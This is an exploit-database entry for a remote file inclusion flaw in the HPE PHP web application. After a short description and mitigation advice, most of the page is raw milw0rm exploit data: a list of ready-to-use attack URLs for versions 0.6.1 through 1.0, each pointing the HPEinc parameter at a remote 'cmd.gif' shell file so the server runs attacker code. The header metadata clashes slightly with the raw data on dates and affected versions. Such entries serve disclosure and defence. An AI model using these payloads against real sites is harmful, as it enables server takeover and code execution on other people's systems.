HPE v0.6.1 Remote File Inclusion Vulnerability

vendor:

HPE

by:

the master

8,8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: HPE

Affected Version From: 0.6.1

Affected Version To: 0.7.0

Patch Exists: YES

Related CWE: N/A

CPE: a:hpe:hpe

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2020

HPE v0.6.1 Remote File Inclusion Vulnerability

HPE versions 0.6.1, 0.6.5 and 0.7.0 are vulnerable to Remote File Inclusion (RFI) attacks. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This URL contains a malicious file which is then included in the application. This can lead to arbitrary code execution on the server.

Mitigation:

To mitigate this vulnerability, the application should be configured to only include files from trusted sources. Additionally, input validation should be performed to ensure that the user-supplied data is valid.

Source

Exploit-DB raw data:

########################################################################
#  HPE v0.6.1  Remote File Inclusion Vulnerability
#
#  Download: http://prdownloads.sourceforge.net/hpe/hpe-1.0.zip?download
#  Download: http://prdownloads.sourceforge.net/hpe/HPE-0.7.0.tar.gz?download
#  Download: http://prdownloads.sourceforge.net/hpe/HPE-0.6.5.tar.gz?download
#  Download: http://prdownloads.sourceforge.net/hpe/HPE-0.6.1.tar.gz?download
#
#  Found By: the master
#
########################################################################

1.0
#  http://[Target]/[Path]/HPE/lang/de.php?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/lang/fr.php?HPEinc=http://cmd.gif?
##############################################################################

0.7.0
#  http://[Target]/[Path]/HPE/clickerr.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/loadcatnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/motd.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/mod.newslog.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
##############################################################################

0.6.5
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.newnews.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.randnews.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.teaser.show.php3?HPEinc=http://cmd.gif?
###############################################################################

0.6.1
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
###############################################################################

# milw0rm.com [2006-08-22]